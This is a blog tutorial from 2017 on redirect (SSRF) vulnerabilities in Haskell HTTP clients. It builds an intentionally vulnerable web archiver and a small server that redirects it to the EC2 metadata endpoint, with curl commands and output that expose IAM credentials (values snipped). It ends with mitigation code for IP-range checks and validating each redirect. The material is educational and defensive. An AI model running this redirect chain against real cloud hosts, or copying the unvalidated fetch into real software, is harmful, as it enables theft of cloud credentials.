Redirect vulnerabilities

Published: 2017-08-09
Words: 1513

In keeping with this blog's aim (writing about things I didn't know about 1-5 years ago), today we discuss redirect vulnerabilities. I wish I had known about these back when I was writing IRC bots and other foolish scripts.

As per usual on topics like this, you're better off reading OWASP. However, half the battle is just knowing that this is something you need to think about.

Summary

When making HTTP requests against untrusted hosts, think twice before following redirects. Blindly following redirects may lead to information disclosure or privilege escalation.

Figure out a threat model, decide on a policy to handle redirects, and stick to it. At the very least, you probably want to disallow redirects into your private network.

GET outta here

Think carefully about all the information your server can access via HTTP.

If it's sitting in your basement, it can probably access a terrible consumer-grade router. That router probably uses Basic authentication over HTTP to perform privileged operations, but it might also have status pages available sans authentication. Other machines on your local network might also be running a HTTP server, maybe for music playback or some terrible IoT toaster.

If it's sitting in a rack in a data center, it's probably part of some virtual network, with access to all your other internal REST services. In a perfect world, these would all require authorisation headers. In practice, they might not require any authentication at all.

If it's running on AWS EC2, depending on its configured role, it can access all your production S3 buckets, talk to IAM, and perform other privileged AWS actions. Fortunately, most AWS HTTP actions require request-signing. It can also access any local REST services exposed in the virtual network, with the same caveats above. Worse, it can access the EC2 instance metadata store, which requires no authentication at all.

When we make a HTTP request to a server that initiates a redirect, that server hands us an arbitrary address. The HTTP client must decide whether to send the same request to that arbitrary address.
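
To make that decision point concrete, here's a minimal sketch of what the client sees when a redirect arrives. The helper names (isRedirectStatus, redirectTarget) and the plain (String, String) header representation are assumptions for illustration, not the API of wreq or http-client:

```haskell
import Data.Char (toLower)

-- | Status codes that ask the client to retry at the Location header.
isRedirectStatus :: Int -> Bool
isRedirectStatus code = code `elem` [301, 302, 303, 307, 308]

-- | If the response is a redirect, return the address the server wants
-- us to visit next. Header names are compared case-insensitively.
-- (Hypothetical helper: headers are simple name/value pairs here.)
redirectTarget :: Int -> [(String, String)] -> Maybe String
redirectTarget code headers
  | isRedirectStatus code =
      lookup "location" [ (map toLower name, value) | (name, value) <- headers ]
  | otherwise = Nothing
```

Whatever comes back from redirectTarget is entirely under the remote server's control, so it deserves the same suspicion as any other untrusted input.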

In other words, blindly following all redirects could lead to the compromise of all the private HTTP services described above. This could expose sensitive user information, network topology, or credentials to your infrastructure.

While the severity depends on the nature of the application, it also depends on the security of the services running in your private network. This is hard to guarantee. It is much easier to just apply heavy scrutiny to potential redirects.

Full compromise

To make things a little more real, I've constructed an especially vulnerable application, and paired it up with a little WAI application that leads it to expose the server's AWS credentials when running on Amazon Lightsail.

Redirects need to be validated at all times, even when performing limited GET requests against a known service, like fetching from NPM. However, services like web crawlers or archivers that send requests to untrusted user-provided URIs are particularly exposed: an attacker simply stands up their own server somewhere, and your server starts hitting any URI they choose.

My toy service is a web archiver. It accepts a URI as a POST parameter, fetches the contents via wreq, and then serves the result from memory under a new unique URI. All code is available here. The code is intentionally poor and should not be used in any circumstances.

The EC2 instance metadata store

When running on EC2, you have an additional REST service to worry about. The instance metadata store is a key-value store used to send data from internal AWS systems to your EC2 instance.

If you haven't heard about it, I suggest reading Colin Percival's blog post "EC2's most dangerous feature", or just curling around http://169.254.169.254 from an EC2 instance.

Here's what it looks like when you poke around in the meta-data subtree:

[ec2-user@ip-XXX-XX-XX-XX ~]$ curl http://169.254.169.254/latest/meta-data/
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/

In addition to things like the instance ID and AMI ID, there's iam. This is how the credentials for the instance's IAM role are delivered! They're available via this HTTP service to any user-mode process, no authentication required.

We can list the IAM roles by curling meta-data/iam/, and then we can simply dump out the keys. I'm targeting Lightsail today, since it always has the same role name and probably doesn't have a lot of permissions:

[ec2-user@ip-XXX-XX-XX-XX ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
AmazonLightsailInstanceRole

... and if we curl that, we get everything we need to authenticate with AWS:

[ec2-user@ip-XXX-XX-XX-XX ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AmazonLightsailInstanceRole
{
  "Code" : "Success",
  "LastUpdated" : "2017-08-09T09:17:26Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "<snip>",
  "SecretAccessKey" : "<snip>",
  "Token" : "<snip>",
  "Expiration" : "2017-08-09T15:51:00Z"
}

If this were running on your actual infrastructure rather than Lightsail and the attacker didn't know your IAM setup, it would take two attempts instead of one to get these credentials.

A very bad service

Our archival service is a pretty simple WAI application. When someone POSTs to /site, it grabs a URI out of the POST payload, fetches it with wreq, and stores the result under a unique ID. When someone GETs /site/{id}, we serve the text back up.

I'll leave out most of the details. Head to the gist to see the full code; the snippets below won't compile on their own.

Here's the interface for the storage backend:

data Storage = Storage {
    insert :: Text -> IO Id
  , lookup :: Id -> IO (Maybe Text)
  }

... and we can mock it up using IORefs trapped in closures:

simpleStorage :: IO Storage
simpleStorage = do
  ref <- IORef.newIORef M.empty
  next <- IORef.newIORef (0 :: Integer)
  let
    fresh = do
      fmap (Id . T.pack . show) . IORef.atomicModifyIORef' next $ \j -> (j+1, j)

    ins t = do
      idd <- fresh
      IORef.atomicModifyIORef' ref $ \m ->
        (M.insert idd t m, idd)

    lkp i =
      fmap (M.lookup i) (IORef.readIORef ref)
  pure (Storage ins lkp)

Our WAI application is pretty straightforward, doing exactly what I described above:

application :: Storage -> Wai.Application
application storage request respond =
  case (Wai.requestMethod request, Wai.pathInfo request) of
    ("POST", ["site"]) ->
      sitePost storage request >>= respond
    ("GET", ["site", uri]) ->
      siteGet storage uri >>= respond
    _ ->
      respond (plain HTTP.status404 [] "Not Found")

... and I'll leave out the resources. We perform a little bit of weak validation on the URI before making any requests. Specifically, we check it's not a bare IP address:

-- | Make a token effort to avoid pinging our local network.
safeUri :: URI -> Maybe URI
safeUri uri = do
  ua <- URI.uriAuthority uri
  let rn = URI.uriRegName ua
  guard (not (URI.isIPv4address rn))
  guard (not (URI.isIPv6address rn))
  pure uri
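
Rejecting every literal IP address is blunter than it needs to be, and it still lets through hostnames like localhost. One alternative is a policy based on address ranges. Here's a minimal sketch using only base; parseIPv4, splitOn and isInternalIPv4 are hypothetical helpers that are not part of the gist. The range list is illustrative rather than exhaustive, and a real check would also need to cover IPv6 and be applied to the address a hostname actually resolves to:

```haskell
import Data.Char (isDigit)

-- | Parse a dotted-quad IPv4 address such as "10.0.0.1".
parseIPv4 :: String -> Maybe (Int, Int, Int, Int)
parseIPv4 s =
  case splitOn '.' s of
    [a, b, c, d] -> (,,,) <$> octet a <*> octet b <*> octet c <*> octet d
    _ -> Nothing
  where
    -- One to three decimal digits, no larger than 255.
    octet t
      | not (null t), length t <= 3, all isDigit t, n <= 255 = Just n
      | otherwise = Nothing
      where
        n = read t :: Int

-- | Split a string on a separator character.
splitOn :: Char -> String -> [String]
splitOn sep str =
  case break (== sep) str of
    (chunk, []) -> [chunk]
    (chunk, _ : rest) -> chunk : splitOn sep rest

-- | True for addresses we never want to reach from a public-facing
-- fetcher: "this network", loopback, the RFC 1918 private ranges, and
-- link-local (which includes the metadata address 169.254.169.254).
isInternalIPv4 :: (Int, Int, Int, Int) -> Bool
isInternalIPv4 (a, b, _, _) =
     a == 0
  || a == 10
  || a == 127
  || (a == 172 && b >= 16 && b <= 31)
  || (a == 192 && b == 168)
  || (a == 169 && b == 254)
```

For example, fmap isInternalIPv4 (parseIPv4 "169.254.169.254") evaluates to Just True, while parseIPv4 "example.com" is Nothing.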

The vulnerability itself is in the way we fetch data from untrusted URIs. Using wreq with defaults, redirects are followed without question, up to a limit of 10 hops. The same is true for http-client, the main alternative to wreq:

-- | Fetch a URI and return the response body.
getText :: URI -> IO (Maybe Text)
getText uri = do
  response <- Wreq.getWith opts uris
  case HTTP.statusCode (response ^. Wreq.responseStatus) of
    200 ->
      case TE.decodeUtf8' (BSL.toStrict (response ^. Wreq.responseBody)) of
        Right txt ->
          pure (Just txt)
        Left _ ->
          pure Nothing
    _ ->
      pure Nothing
  where
    uris = uriToString id uri []
    opts = Wreq.defaults & Wreq.header "Accept" .~ ["text/plain"]

When we stand up the server, we can observe it kinda works (although I haven't bothered handling MIME types properly, nor have we handled wreq's exceptions):

$ curl -X POST -d 'site=http%3A%2F%2Fwww.gutenberg.org%2Ffiles%2F11%2F11-0.txt' localhost:8000/site
Created
$ curl localhost:8000/site/0 2>/dev/null | head
Project Gutenberg’s Alice’s Adventures in Wonderland, by Lewis Carroll

This eBook is for the use of anyone anywhere at no cost and with
almost no restrictions whatsoever.  You may copy it, give it away or
re-use it under the terms of the Project Gutenberg License included
with this eBook or online at www.gutenberg.org


Title: Alice’s Adventures in Wonderland

A very bad server

It's really, truly straightforward to redirect a request to a constant address! Here's all we need to send the archiver straight into the EC2 instance metadata store:

application :: Wai.Application
application _request respond =
  respond $
    Wai.responseLBS HTTP.status302 [(HTTP.hLocation, location)] mempty

location :: ByteString
location =
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/AmazonLightsailInstanceRole"

Running this pair on my Lightsail box, we can pretty easily trick the crawler into serving AWS credentials for all to see:

$ curl -X POST -d 'site=http%3A%2F%2Flocalhost%3A8080' localhost:8000/site
Created
$ curl localhost:8000/site/1
{
  "Code" : "Success",
  "LastUpdated" : "2017-08-09T09:17:26Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "<snip>",
  "SecretAccessKey" : "<snip>",
  "Token" : "<snip>",
  "Expiration" : "2017-08-09T15:51:00Z"
}

Though we were "certain" that the initial URI was safe, we didn't validate the subsequent redirected URIs at all, and now everything's ruined. Be careful out there.

Mitigation

Here are a few possible strategies to mitigate redirects:

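Working with either wreq or http-client, it's pretty straightforward to implement such strategies. Don't follow redirects automatically, check for a redirect response code (301, 302, 303, 307, or 308), and apply scrutiny to the Location header before making the next request.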
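
As a rough sketch of what that could look like, here's a redirect-following loop that checks a policy before every request, including each hop. Everything here is hypothetical and library-agnostic: Response, FetchError and fetchWithPolicy are names made up for illustration, the policy is any String -> Bool you care to supply, and fetchOnce stands in for a single request made with automatic redirects switched off:

```haskell
-- | What a single, non-following HTTP request can tell us.
data Response
  = Redirect String   -- a redirect status with a Location header
  | Body String       -- a successful response with a body
  | Failed            -- anything else

data FetchError
  = Blocked String    -- the policy rejected this URI
  | TooManyRedirects
  | RequestFailed
  deriving (Eq, Show)

-- | Fetch a URI, consulting the policy before *every* request,
-- not just the first one.
fetchWithPolicy
  :: Monad m
  => (String -> Bool)        -- policy: is this URI allowed?
  -> (String -> m Response)  -- one request, redirects disabled
  -> Int                     -- maximum number of redirects to follow
  -> String                  -- starting URI
  -> m (Either FetchError String)
fetchWithPolicy allowed fetchOnce = go
  where
    go hops uri
      | not (allowed uri) = pure (Left (Blocked uri))
      | otherwise = do
          response <- fetchOnce uri
          case response of
            Body txt -> pure (Right txt)
            Failed -> pure (Left RequestFailed)
            Redirect next
              | hops <= 0 -> pure (Left TooManyRedirects)
              | otherwise -> go (hops - 1) next
```

With http-client, setting redirectCount to 0 on the Request should give you the non-following behaviour fetchOnce assumes, and wreq exposes a similar redirects option. A real implementation would also need to resolve relative Location values against the current URI before checking them.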